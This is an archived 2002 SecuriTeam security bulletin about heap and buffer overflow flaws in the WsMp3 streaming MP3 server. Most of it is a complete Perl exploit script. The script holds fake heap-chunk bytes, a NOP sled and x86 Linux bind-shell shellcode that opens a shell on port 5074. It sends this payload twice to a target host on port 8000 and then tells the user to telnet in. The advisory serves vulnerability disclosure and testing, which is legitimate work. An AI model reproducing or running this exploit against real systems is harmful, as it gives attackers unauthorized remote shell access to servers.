[EXPL] Remote Heap malloc/free and Multiple Overflow Vulnerability in WSMP3 (Exploit)

• Previous message: support@securiteam.com: "[UNIX] chetcpasswd.cgi Multiple Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 22 Dec 2002 12:15:01 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -

  Remote Heap malloc/free and Multiple Overflow Vulnerability in WSMP3
(Exploit)
------------------------------------------------------------------------

SUMMARY

WsMp3, also known as "Web_servert", is a streaming MP3 server for
Unix-based operating systems written by Mirko De Grandis. WsMp3 versions
0.0.6 and earlier are vulnerable to multiple buffer overflows in the
web_server.c file. A remote attacker could exploit one of these buffer
overflows to execute arbitrary code on the system with privileges of the
Web server process. The following is an exploit code that can be used to
test the system for the vulnerability.

DETAILS

Exploit:
#!/usr/bin/perl -w
#
#
# Remote Heap malloc/free & multiple Overflow vulnerability in WSMP3.
# Bug found by; dong-h0un U
# Exploit Coded By; Damian Myerscough
#
# visit: www.securityfreaks.com
# visit: http://x82.i21c.net
#
# 0x02. Vulnerable Packages
# =-=-=-=-=-=-=-=-=-=-=-=-=
#
# Vendor site: http://wsmp3.sourceforge.net/
#
# web_server-0.0.6
# -web_server-0.0.6.tar.gz
# +RedHat Linux 6.x
# web_server-0.0.5 (exploitable)
# -web_server-0.0.5.tar.gz
# web_server-0.0.4
# -web_server-0.0.4.tar.gz
# web_server-0.0.3
# -web_server-0.0.3.tar.gz.gz
# wsmp3-0.0.2
# -web_server-0.0.2.tar.gz
# web_server-v.0.0.1
# -web_server.tar.gz
#
# Tested On Redhat 6.1 (cartman)
#
#

use IO::Socket;

$Shellcode = "\x41\x41\x41\x41". # offset
             "\x41\x41\x41\x41". # offset
             "\x41\x41\x41\x41". # offset
             "\x41\x41\x41\x41". # offset 16 bytes
             "\xfc\xff\xff\xff". # chunk header
             "\xff\xff\xff\xff". # ""
             "\xa0\x1b\x05\x08". # 0x08051bac-12
             "\xd0\x7b\xff\xbf". # 0xbfff7bd0
             "\x20". # ' '
             "\x90\x90\x90\x90\x90\x90\x90\x90". # nop
             "\xeb\x0c\xeb\x0c\xeb\x0c\xeb\x0c". # nop 12 bytes jumpcode
             "\x90\x90\x90\x90\x90\x90\x90\x90". # nop
             "\x90\x90\x90\x90\x90\x90\x90\x90". # nop
             #Shellcode Binds a port on 5074 This shellcode is 92 bytes
             "\x31\xc0".
             "\x50".
             "\x40".
             "\x89\xc3".
             "\x50".
             "\x40".
             "\x50".
             "\x89\xe1".
             "\xb0\x66".
             "\xcd\x80".
             "\x31\xd2".
             "\x52".
             "\x66\x68\x13\xd2".
             "\x43".
             "\x66\x53".
             "\x89\xe1".
             "\x6a\x10".
             "\x51".
             "\x50".
             "\x89\xe1".
             "\xb0\x66".
             "\xcd\x80".
             "\x40".
             "\x89\x44\x24\x04".
             "\x43".
             "\x43".
             "\xb0\x66".
             "\xcd\x80".
             "\x83\xc4\x0c".
             "\x52".
             "\x52".
             "\x43".
             "\xb0\x66".
             "\xcd\x80".
             "\x93".
             "\x89\xd1".
             "\xb0\x3f".
             "\xcd\x80".
             "\x41".
             "\x80\xf9\x03".
             "\x75\xf6".
             "\x52".
             "\x68\x6e\x2f\x73\x68".
             "\x68\x2f\x2f\x62\x69".
             "\x89\xe3".
             "\x52".
             "\x53".
             "\x89\xe1".
             "\xb0\x0b".
             "\xcd\x80";

print"+==========================================+\n";
print" Remote Heap malloc/free WSMP3 \n";
print" Coded By; Damian Myerscough \n";
print" Bug found By; dong-h0un U \n";
print" Offset done By; dong-h0un U \n";
print"+==========================================+\n\n";

print"Enter a Host: ";
 $Host = <STDIN>;
  chop($Host);

# First connect.
$Socket = IO::Socket::INET->new(Proto =>"tcp",
                                PeerAddr =>$Host,
                                PeerPort =>8000) || die "Could not connect
to $Host \n";

print"Sending Fake Chunk.\n";
print $Socket "$Shellcode";
close($Socket);

# Second connect.
$Socket = IO::Socket::INET->new(Proto =>"tcp",
                                PeerAddr =>$Host,
                                PeerPort =>8000) || die "Could not connect
to $Host \n";
print"Sending Shellcode.\n";
print $Socket "$Shellcode";
close($Socket);

print"Binded port.\n";
print"Telnet to $Host at port 5074\n";

ADDITIONAL INFORMATION

The information has been provided by <mailto:xxxdamoxxx@hotmail.com> Damo
Damo.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Next message: support@securiteam.com: "[NEWS] XSS Vulnerabilities in Oracle Website"
• Previous message: support@securiteam.com: "[UNIX] chetcpasswd.cgi Multiple Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]